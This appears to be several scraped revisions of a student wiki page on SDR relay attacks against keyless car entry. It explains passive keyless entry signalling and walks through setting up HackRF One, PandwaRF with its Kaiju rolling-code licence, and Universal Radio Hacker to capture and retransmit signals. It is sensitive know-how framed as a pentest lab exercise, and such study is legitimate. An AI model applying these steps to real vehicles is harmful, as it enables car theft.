&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well (Only for Garage Openers), but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10376</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10376"/>
		<updated>2022-07-14T08:40:00Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Conclusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is in the near of, an “Acknowledgement” is transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check is going to start.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well (Only for Garage Openers), but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10375</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10375"/>
		<updated>2022-07-14T08:35:58Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Requirements */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is in the near of, an “Acknowledgement” is transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check is going to start.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10374</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10374"/>
		<updated>2022-07-14T08:33:42Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Introduction */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is in the near of, an “Acknowledgement” is transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check is going to start.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10287</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10287"/>
		<updated>2022-07-12T18:44:13Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Requirements */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
